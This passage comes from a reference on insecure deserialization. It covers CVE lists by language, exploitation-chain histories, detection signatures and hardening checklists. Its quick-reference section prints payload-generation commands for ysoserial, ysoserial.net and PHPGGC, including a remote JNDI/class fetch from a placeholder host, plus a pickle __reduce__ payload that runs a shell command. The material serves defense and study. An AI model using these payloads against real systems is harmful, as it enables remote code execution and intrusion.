| CVE-2019-2725 | WebLogic | XMLDecoder unauthenticated RCE |
| CVE-2019-17571 | Log4j 1.x SocketServer | ObjectInputStream on log socket |
| CVE-2021-44228 | Log4Shell | JNDI lookup (adjacent but not pure deser) |
| CVE-2022-1471 | SnakeYAML | !!ScriptEngineManager with URLClassLoader |
| CVE-2022-22963 | Spring Cloud Function | SpEL via spring.cloud.function.routing-expression |
| CVE-2022-22965 | Spring4Shell | Class.module.classLoader binding exposure |
| CVE-2022-33980 | Apache Commons Configuration | Script interpolator |
| CVE-2023-22518 | Confluence | WebWork deserialization |
| CVE-2024-36991 | Splunk | Path traversal → file-based deser |
| CVE-2026-33728 | dd-trace-java RMI instrumentation | Unsafe deserialization in RMI instrumentation may lead to RCE |
| CVE-2026-33439 | OpenAM | Pre-auth RCE via Java deserialization |
PHP#
| CVE | Product | Chain |
|---|---|---|
| CVE-2015-8562 | Joomla | User-Agent injection → session deser → POP chain |
| CVE-2016-9920 | PhpMyAdmin | __destruct file write |
| CVE-2017-12794 | Symfony | Property injection via session cookie |
| CVE-2018-17057 | Yii 2 | __destruct via BatchAction |
| CVE-2019-6340 | Drupal 8 | REST _type POP chain |
| CVE-2019-11043 | PHP-FPM | Adjacent (not pure deser) |
| CVE-2020-28949 | Archive_Tar | Phar deser via tar extract |
| CVE-2021-41773 | — | (Apache path traversal, adjacent) |
| CVE-2023-1671 | Sophos Web Appliance | PHP deser RCE |
| CVE-2024-4577 | PHP CGI | Adjacent argument injection |
| CVE-2026-3422 | U-Office Force | Critical RCE via insecure deserialization |
Python#
| CVE | Product | Pattern |
|---|---|---|
| CVE-2017-7610 | Ansible Tower | YAML deser |
| CVE-2019-20477 | PyYAML | FullLoader bypass |
| CVE-2020-14343 | PyYAML | Bypass of earlier fix |
| CVE-2022-0330 | graphql-python | pickle session |
| CVE-2023-27586 | torch.load | Pre-weights_only default |
| CVE-2025-32444 | vLLM Mooncake | ZeroMQ recv_pyobj() on 0.0.0.0 (CVSS 10.0) |
| CVE-2025-24357 | vLLM | Torch checkpoint untrusted load |
| CVE-2026-24009 | Docling | PyYAML regression via unpinned dep |
| CVE-2026-25769 | Wazuh | Critical RCE via unsafe deserialization |
| CVE-2026-26220 | LightLLM | WebSocket pickle with broken nonce auth |
| CVE (picklescan) | picklescan | 4 separate bypass CVEs in 2025 (Sonatype) |
| CVE (picklescan) | picklescan | 3 zero-days disclosed by JFrog |
| IBM Langflow Desktop | Langflow | RCE via insecure deserialization |
.NET#
| CVE | Product | Pattern |
|---|---|---|
| CVE-2017-9424 | SharePoint | XmlSerializer with untyped payload |
| CVE-2019-0604 | SharePoint | XmlSerializer via ItemMetadata |
| CVE-2020-0688 | Exchange | ViewState forgery with static machine key |
| CVE-2020-0932 | SharePoint | BinaryFormatter |
| CVE-2020-25258 | Hyland OnBase | BinaryFormatter |
| CVE-2021-27076 | SharePoint | Replay-style ObjectStateFormatter |
| CVE-2021-29508 | Wire (Proto.Actor) | BinaryFormatter-backed IPC |
| CVE-2022-21969 | Exchange | BinaryFormatter in MAPI |
| CVE-2023-3513 | Razer Central | BinaryFormatter named pipe |
| CVE-2023-5914 | CentralSquare | BinaryFormatter |
| CVE-2024-29847 | Ivanti EPM | Agent Portal deserialization |
| CVE-2024-38094 | SharePoint | XML deserialization |
| CVE-2025-53770 | SharePoint ToolShell | ViewState deser chain, actively exploited |
| CVE-2026-20963 | SharePoint | Deserialization RCE |
| CVE-2026-26114 | SharePoint | Deserialization RCE |
| SolarWinds WHD | Web Help Desk | Java deserialization enabling command execution |
Ruby#
| CVE | Product | Pattern |
|---|---|---|
| CVE-2013-0156 | Rails | YAML in XML params |
| CVE-2019-5420 | Rails 5.2 | Marshal in dev mode secret key |
| CVE-2020-8163 | Rails | Local variables in partials |
| CVE-2022-32224 | Rails | :marshal cache store user-reachable |
| — | RubyGems.org | Multiple informational-severity Marshal issues (ToB audit) |
Notable exploitation chains#
SharePoint ToolShell (CVE-2025-53770, July 2025). Unauthenticated attackers POST a crafted request to /_layouts/15/ToolPane.aspx with a __VIEWSTATE carrying a deserialization payload (TextFormattingRunProperties → XAML → Process.Start). The webshell then parses additional VIEWSTATE-encoded commands. Check Point Research observed 4,600+ compromise attempts across 300+ organizations in one week; the same IPs chained Ivanti EPMM CVE-2025-4427/4428 for lateral movement. Mitigation required rotating ASP.NET machine keys in addition to patching.
WebLogic Christmas (CVE-2015-4852 → CVE-2017-10271 → CVE-2019-2725 → …). A continuous stream of deserialization RCEs against Oracle WebLogic over a 5+ year window. Each patch closed one reachable deserializer endpoint; the next CVE found another (T3 → IIOP → XMLDecoder in wls-wsat → async SOAP → …). Illustrates the “cannot patch your way out” property at enterprise scale.
Jenkins Jenkinspocalypse (CVE-2015-8103, CVE-2016-0792, CVE-2016-9299). Unauthenticated Jenkins instances exposed a CLI port that accepted serialized Java objects. CommonsCollections gadget was directly applicable. Thousands of public Jenkins instances fell in the ensuing mass-exploitation wave.
Equifax (CVE-2017-5638, Struts2). Not pure deserialization — OGNL injection via Content-Type — but illustrates the same root cause: attacker-controlled data reaches a VM that interprets it as code. Directly led to the exposure of 147 million records.
Log4Shell adjacency (CVE-2021-44228). JNDI lookups embedded in log strings fetch remote Reference objects; upon resolution, the javaSerializedData field is deserialized via the classic JDK path, re-entering the deserialization attack family through a logging front door.
12. Tools & Automation#
Offensive tooling (used defensively for payload generation, detection, and validation)#
| Tool | Language | Purpose |
|---|---|---|
| ysoserial | Java | Canonical Java deserialization payload generator (~30 chains) |
| ysoserial.net | .NET | Equivalent for .NET with ~15 gadget families including XAML chains |
| marshalsec | Java | Non-JDK formats: Jackson, XStream, Kryo, Hessian, JYaml, Red5, JSON-IO |
| PHPGGC | PHP | Curated PHP POP chain database and payload generator |
| Fickling | Python | Pickle decompiler, static analyzer, payload constructor |
| ModelScan | Python | ML model file scanner (ProtectAI) |
| picklescan | Python | HuggingFace’s blocklist scanner (known bypasses exist) |
| GadgetProbe | Java | DNS-based blind classpath fingerprinting |
| Freddy | Burp plugin | Injects deserialization payloads across formats |
| SerialKiller | Java | Runtime allowlist enforcement (wrap around ObjectInputStream) |
| not-so-serial | Java | Runtime blocklist enforcement |
| ConstructionInspector | Java | Build-time gadget detection via classpath analysis |
| Semgrep rules | Multi | TrailOfBits published rules for Ruby (marshal-load-method, rails-cache-store-marshal, yaml-unsafe-load, json-create-deserialization) |
| CodeQL queries | Multi | GitHub Security Lab publishes unsafe-deserialization queries for Java, Ruby, Python, C# |
ysoserial usage (defensive validation)#
Security teams use ysoserial to validate that patches, allowlists, and WAF rules actually block known payloads. The tool takes a chain name and command; it emits serialized bytes suitable for piping into a test harness that represents your application’s deserialization sink. Chains select which library prerequisites must be on the classpath to succeed.
marshalsec#
Moritz Bechler’s marshalsec covers the non-JDK format space (Jackson, XStream, Kryo, Hessian, JYaml, etc.). It is the reference for understanding that “Java deserialization” is not just ObjectInputStream — every polymorphic serializer in the ecosystem has the same category of bug.
PHPGGC#
./phpggc Monolog/RCE1 system id produces a serialized payload for the Monolog RCE1 chain. Chains are namespaced by target library: Laravel/RCE1..n, Drupal/RCE1..n, Symfony/RCE1..n, Wordpress/RCE1..n, PrestaShop/RCE1..n, Yii/RCE1..n, and many more. Use -l <keyword> to list chains, -u to URL-encode, -b64 to base64, --phar to produce a PHAR file (for the phar:// trick).
Fickling#
Trail of Bits’s Fickling disassembles pickle bytecode (a static analysis step no generic analyzer performs by default). It can detect known-malicious patterns, decompile pickle opcodes to pseudo-Python, and construct payloads to test defenses. Critically, it demonstrates how trivially pickle exploitation generalizes — any callable reachable from Python’s import system is a gadget.
Build-time detection#
- Dependency scanning: identify
commons-collections,commons-beanutils,spring-core,jackson-databind,xstream,groovy,hibernate,c3p0,rome,snakeyamlversions against known-vulnerable ranges. - Classpath hygiene: remove unused libraries. A gadget in an unused library is still a gadget.
- SBOM generation: CycloneDX/SPDX inventories plus vulnerability databases (OSS Index, GHSA) will catch most known-bad versions.
Runtime detection#
- Java:
ObjectInputFilter(JEP 290, JDK 9+) allows allowlist/blocklist of classes duringreadObject. Available on modern JDKs for legacy code that cannot be rewritten. - .NET: the
SerializationBinderproperty onBinaryFormatterallows restricting types; however, Microsoft’s own guidance states this is insufficient and BinaryFormatter should be retired entirely. - Ruby:
Marshal.loadhas no type filter. Wrap in a custom class-checking loader or migrate. - Python: subclassing
pickle.Unpicklerand overridingfind_classto allowlist is the documented approach. It works but is fragile — see picklescan bypass research.
13. Detection & Static Analysis#
Taint source → sink patterns#
| Language | Source | Sink |
|---|---|---|
| Java | HttpServletRequest.getInputStream() | new ObjectInputStream(...).readObject() |
| Java | request.getParameter(...) → Base64.decode | readObject, XMLDecoder.readObject |
| PHP | $_GET, $_POST, $_COOKIE, file_get_contents("php://input") | unserialize, yaml_parse |
| PHP | Any user-controlled path | file_exists("phar://$path"), filesize, is_dir |
| Python | request.data, websocket.receive_bytes, socket.recv | pickle.loads, joblib.load, torch.load |
| Python | File path from DB / config / upload | yaml.load, yaml.unsafe_load |
| .NET | Request.Form, Request.InputStream, Request["__VIEWSTATE"] | BinaryFormatter.Deserialize, ObjectStateFormatter.Deserialize |
| .NET | JsonConvert.DeserializeObject with TypeNameHandling != None | The call itself |
| Ruby | params[:data], cookies[:session] | Marshal.load, YAML.load (unsafe), Oj.load default |
| Node.js | req.body, req.query | serialize.unserialize, eval, vm.runInNewContext |
CodeQL query shape#
GitHub Security Lab’s unsafe deserialization queries model:
- A set of known-dangerous deserialization calls as sinks.
- A standard HTTP-input taint source set.
- An intermediate “encoding” sanitizer set that does not actually sanitize but is often wrongly assumed to (Base64, URL-decode, JSON.parse).
- Path constraints requiring the sink to be reachable from the source without passing through type-safe deserializers.
Semgrep / grep signatures#
# Java
pattern: new ObjectInputStream($X).readObject()
pattern: new XMLDecoder(...).readObject()
pattern: new Yaml().load($X) # SnakeYAML
pattern: $MAPPER.enableDefaultTyping()
pattern: XStream().fromXML($X) # without setupDefaultSecurity
pattern: Kryo.readClassAndObject(...)
# PHP
pattern: unserialize($_...)
pattern: unserialize($$X) where $$X from $_GET/$_POST/$_COOKIE
pattern: yaml_parse($X)
pattern: file operation on user-controlled "phar://..."
# Python
pattern: pickle.loads(...)
pattern: pickle.load(...)
pattern: joblib.load(...)
pattern: torch.load(...) # without weights_only=True
pattern: numpy.load(..., allow_pickle=True)
pattern: yaml.load($X) # without SafeLoader
pattern: yaml.unsafe_load(...)
pattern: recv_pyobj()
# .NET
pattern: new BinaryFormatter().Deserialize(...)
pattern: new SoapFormatter().Deserialize(...)
pattern: new NetDataContractSerializer().ReadObject(...)
pattern: new ObjectStateFormatter().Deserialize(...)
pattern: new LosFormatter().Deserialize(...)
pattern: JsonConvert.DeserializeObject<$T>(..., settings with TypeNameHandling.All|Objects|Arrays|Auto)
pattern: new JavaScriptSerializer(new SimpleTypeResolver())
# Ruby
pattern: Marshal.load(...)
pattern: YAML.load(...) # if pre-Psych 4
pattern: YAML.unsafe_load(...)
pattern: Oj.load(...) # default mode
pattern: JSON.parse(..., create_additions: true)
pattern: Rails.cache with :marshal coder
# Node.js
pattern: serialize.unserialize(...)
pattern: eval(<user data>)
pattern: new Function(<user data>)
pattern: vm.runInNewContext(<user data>)
Runtime telemetry signals#
- Java
ClassNotFoundExceptionbursts during deserialization — attacker probing which gadget classes exist. - Outbound DNS lookups correlated with request handlers — URLDNS probe pattern.
- JRMP/LDAP outbound from app servers — JNDI gadget signal.
- Process spawn by application JVM/CLR/PHP/Python workers — deserialization RCE footprint.
- Unusual child processes under w3wp.exe — ViewState RCE.
- Memory/CPU spikes with deep object graphs — DoS attempts.
readObjectstack frames in production stack traces — inventory for review.
Log-based detection#
Log deserialization exceptions. Many real exploits throw exceptions partway through the chain (e.g., cast failures after the side-effect-bearing gadget fires). A spike of ClassCastException, InvalidClassException, java.io.StreamCorruptedException, _pickle.UnpicklingError, TypeError: __reduce__ is a signal.
14. Prevention & Mitigation#
The hierarchy of fixes (strongest first)#
1. Don’t deserialize untrusted data at all. This is the only truly safe position. Use a format that cannot encode arbitrary classes: JSON (without @class / $type / polymorphic typing), Protocol Buffers, MessagePack, CBOR, FlatBuffers, Cap’n Proto. Parse these into fixed, known data types — never “generic object.”
2. If you must use a native format, use integrity protection. Sign the serialized blob with an HMAC using a server-held key. Verify the signature before invoking any deserialization. This does not make deserialization safe — it merely ensures the bytes came from your own code. Ruby’s MessageVerifier, Rails signed cookies, and JWT (with proper algorithm binding) are examples. Caveat: key leaks (ASP.NET machine key, Rails secret_key_base) turn this from a hard problem into a trivial one, as ViewState exploits repeatedly demonstrate.
3. Apply type allowlists at the deserializer.
- Java:
ObjectInputFilter.Config.setSerialFilter(...)globally, or per-stream viaoos.setObjectInputFilter(...)(JEP 290). Allowlist expected classes only. - .NET: abandon
BinaryFormatter. If unavoidable, aSerializationBinderrestricting types is the documented mitigation — but Microsoft explicitly says this cannot be made secure. - Python: subclass
pickle.Unpickler, overridefind_class(module, name)to raise on anything not in a tight allowlist. Better: use the PickleBall approach of per-library generated policies. - Ruby: wrap
Marshal.load— no built-in filter exists. Trail of Bits recommends addingMarshal.safe_loadupstream. - PHP:
unserialize($data, ['allowed_classes' => ['ExpectedClass']])(PHP 7.0+) restricts instantiation but does not prevent__wakeup/__destructon allowed classes from being abused.
4. Isolate the deserializer. Run the code that does deserialization in a separate process, container, or sandbox with:
- No network egress to metadata services or internal endpoints
- Read-only filesystem where possible
- Minimal privileges (non-root, no cloud credentials via IMDS)
- Resource limits to bound DoS blast radius
5. Defense in depth. Logging, anomaly detection, WAF rules for serialized magic bytes (rO0, AAEAAAD, O: at start of body), egress filtering of JRMP/LDAP/unusual DNS patterns.
Format-specific migration targets#
| From | To |
|---|---|
Java ObjectInputStream | JSON (Jackson with fixed types, no default typing) or Protobuf |
PHP unserialize | json_encode / json_decode with explicit fields |
Python pickle for models | Safetensors for tensors, ONNX for graphs, JSON for metadata |
Python pickle for IPC | JSON, MessagePack, Protobuf |
Ruby Marshal | JSON with typed columns, MessagePack, Protobuf |
.NET BinaryFormatter | System.Text.Json or DataContractSerializer with known types |
| ASP.NET ViewState | Stateless pages, signed tokens, server-side session |
| YAML with types | safe_load / SafeConstructor; never yaml.load (Python pre-5.1) or Yaml().load (SnakeYAML <2.0) |
ML pipeline hardening checklist#
Based on the lessons from CVE-2025-32444, CVE-2026-26220, and the picklescan bypass research:
- Migrate model weights to safetensors wherever possible. Default in HuggingFace
transformerssince 2022. - Set
torch.load(..., weights_only=True)on every load site.torch.loadwithout this is a code review finding. - Never call
joblib.loadon user-controlled paths. Never call it on paths whose chain of custody isn’t fully trusted. - Sign model artifacts at training time with a key managed separately from the model storage. Verify before load.
- If you must support pickle, use PickleBall per-library policies rather than blocklist scanners.
- Do not use pickle as an IPC format between distributed serving nodes. Use JSON/MessagePack/Protobuf.
recv_pyobj()is the anti-pattern. - Ensure distributed serving sockets bind to localhost or authenticated-only listeners. Verify default configurations — LightLLM’s empty-string nonce is the cautionary tale.
- Scan model uploads with
ModelScan+ Fickling, knowing both have bypasses. - Restrict the process running inference: no IMDS, no outbound egress, minimal filesystem.
- Log every model load path. Alert on loads from unexpected origins.
.NET / SharePoint hardening checklist (post-ToolShell)#
- Apply all SharePoint deserialization patches immediately on release; patch velocity is the single strongest signal in the CVE-2025-53770 victim distribution.
- Rotate ASP.NET machine keys. Assume any machine key that was ever on a compromised host is burned.
- Enable AMSI (Anti-Malware Scan Interface) integration for SharePoint.
- Restrict ViewState to MAC-validated, encrypted mode.
- Front SharePoint with a WAF with deserialization payload signatures; limit internet exposure where possible.
- Inventory
BinaryFormatter,SoapFormatter,NetDataContractSerializer,LosFormatter,ObjectStateFormatterusages and plan retirement. - Block outbound LDAP, RMI, and arbitrary HTTP from IIS worker processes.
- Monitor
w3wp.exespawningcmd.exe,powershell.exe,certutil.exe.
Java hardening checklist#
- Enable JEP 290 global filter with an allowlist. Start with an aggressive default-deny list and allowlist observed legitimate classes.
- Inventory and upgrade:
commons-collections(>=3.2.2 removed unsafe functors; >=4.1 for 4.x),commons-beanutils(>=1.9.4),jackson-databind(latest),xstream(>=1.4.20),snakeyaml(>=2.0),log4j(>=2.17.1). - Remove
Jacksondefault typing. Never callenableDefaultTyping()or set@JsonTypeInfo(use = Id.CLASS)on untrusted input. - Disable RMI registry exposure. Do not publish JMX on untrusted networks.
- Retire
XMLDecoderfor untrusted input entirely. - Audit any custom
readObject,readResolve,readExternalmethods in your own code. - Set up outbound firewall rules from JVM processes — block unexpected JRMP/LDAP traffic.
PHP hardening checklist#
- Replace all
unserialize($untrusted)withjson_decode($untrusted)where possible. - Where replacement is infeasible, use
unserialize($data, ['allowed_classes' => false])or a tight allowlist. - Upgrade to PHP 8+ to eliminate implicit phar metadata deserialization.
- Audit all file operations for
phar://reachability from user input. - Store session data using a non-serializing handler or sign cookies.
- Disable
unserialize_callback_func. - Inventory and update CMS platforms: Drupal, Joomla, WordPress, Magento, PrestaShop.
Ruby hardening checklist#
- Replace
Marshal.load(untrusted)with JSON with explicit schema. - Migrate Rails cache store off
:marshal(Rails 7.1+ defaults to:jsonfor some stores; verify). - Upgrade Ruby to 3.1+ for
YAML.loadsafe default. - Disable
JSON.parse(create_additions: true)andOj.loaddefault mode. - Run TrailOfBits’s Semgrep rules in CI:
marshal-load-method,rails-cache-store-marshal,yaml-unsafe-load,json-create-deserialization. - Audit any custom
marshal_load/marshal_dumpmethods.
15. Signature & Gadget Quick Reference#
Magic bytes / payload prefixes#
Java serialized (raw): AC ED 00 05
Java serialized (base64): rO0AB
.NET BinaryFormatter: 00 01 00 00 00 FF FF FF FF 01 00 00 00
.NET BinaryFormatter (b64): AAEAAAD/////AQAAAA
Python pickle (proto 2): 80 02
Python pickle (proto 4): 80 04
Python pickle (proto 5): 80 05
Ruby Marshal: 04 08
PHP serialized object: O:<digit>+:"
PHP serialized array: a:<digit>+:{
ASP.NET ViewState prefix: /wEP / /wEX / /wET
PHAR stub: <?php __HALT_COMPILER();
SnakeYAML tag prefix: !!javax. / !!org. / !!java.
Java ysoserial chain selector#
ysoserial CommonsCollections1 "cmd" # JDK ≤ 8u71 + commons-collections 3.x
ysoserial CommonsCollections5 "cmd" # any JDK + commons-collections 3.x
ysoserial CommonsCollections6 "cmd" # any JDK + commons-collections 3.x
ysoserial CommonsBeanutils1 "cmd" # commons-beanutils + commons-collections
ysoserial Groovy1 "cmd" # groovy ≤ 2.4.3
ysoserial Hibernate1 "cmd" # hibernate 3.x
ysoserial Jdk7u21 "cmd" # pure JDK ≤ 7u21 (no external deps)
ysoserial JRMPClient "rmi://host:port/obj" # outbound JRMP
ysoserial URLDNS "http://probe.dns/" # blind probe, no RCE
ysoserial Spring1 "cmd" # older spring-core
ysoserial ROME "cmd" # ROME + Spring
ysoserial MozillaRhino1 "cmd" # mozilla rhino
ysoserial Click1 "cmd" # click framework
ysoserial Clojure "cmd" # clojure 1.x
ysoserial C3P0 "http://host/" Exploit # c3p0 JNDI fetch + class
.NET ysoserial.net gadgets#
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc"
ysoserial.exe -g TextFormattingRunProperties -f Json.Net -c "calc"
ysoserial.exe -g ActivitySurrogateSelector -f BinaryFormatter -c calc.cs
ysoserial.exe -g WindowsIdentity -f BinaryFormatter -c "calc"
ysoserial.exe -g DataSet -f XmlSerializer -c "calc"
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc"
ysoserial.exe -g SessionSecurityToken -f BinaryFormatter -c "calc"
PHPGGC chain selector#
phpggc -l laravel # list Laravel chains
phpggc Laravel/RCE1 system id
phpggc Monolog/RCE1 system id
phpggc Guzzle/RCE1 system id
phpggc WordPress/RCE1 system id
phpggc Drupal/RCE1 system id
phpggc Symfony/RCE4 system id
phpggc -b -u Laravel/RCE9 system id # base64 URL-encoded
phpggc --phar=zip Monolog/RCE1 system id -o payload.phar
Python pickle one-liner test#
import pickle, os
class P:
def __reduce__(self):
return (os.system, ("id",))
payload = pickle.dumps(P())
# Never use this on production systems — defensive validation only
Ruby Marshal gadget family (current canonical)#
Gem::SpecFetcher
└─ Gem::Version
└─ Gem::RequestSet::Lockfile
└─ Gem::RequestSet
└─ Gem::Resolver::SpecSpecification
└─ Gem::Resolver::GitSpecification
└─ Gem::Source::Git
└─ git clone with backtick-injected reference
└─ shell metacharacter expansion → RCE
Magic method hooks by language#
| Language | Hooks fired during / after deserialization |
|---|---|
| Java | readObject, readResolve, readObjectNoData, readExternal, validateObject, custom finalize |
| PHP | __wakeup, __unserialize, __destruct, __toString, __call, __invoke, __get, __set |
| Python (pickle) | __reduce__, __reduce_ex__, __setstate__, __getstate__, __new__, __init_subclass__ |
| .NET | [OnDeserializing], [OnDeserialized], ISerializable.GetObjectData, constructor with SerializationInfo, IDeserializationCallback.OnDeserialization |
| Ruby (Marshal) | marshal_load, _load, _dump_data, init_with (YAML), encode_with |
| Node.js | toJSON, any property getters triggered during reconstruction, eval-based schemes via Function strings |
Universal defensive rule of thumb#
If a byte stream from the network, disk, or database reconstructs an object by choosing the object’s class from inside the byte stream — treat it as code. If it reaches a native deserialization API of any language described above without HMAC verification, a hard type allowlist, and process isolation, it is a remote code execution vulnerability. Not “potentially.” Not “if gadgets are present.” Gadgets are always present on any real-world classpath. The question is only whether anyone has enumerated them yet.
Compiled from 47 research sources covering OWASP guidance, PortSwigger Web Security Academy, TrailOfBits Ruby research, GitHub Security Lab CodeQL queries, GreyNoise Labs, Sonar, Check Point, Resecurity, Brown University PickleBall research, Sonatype and JFrog picklescan bypasses, ysoserial / ysoserial.net / marshalsec / PHPGGC project documentation, Microsoft .NET security advisories, and CVE write-ups spanning 2013–2026.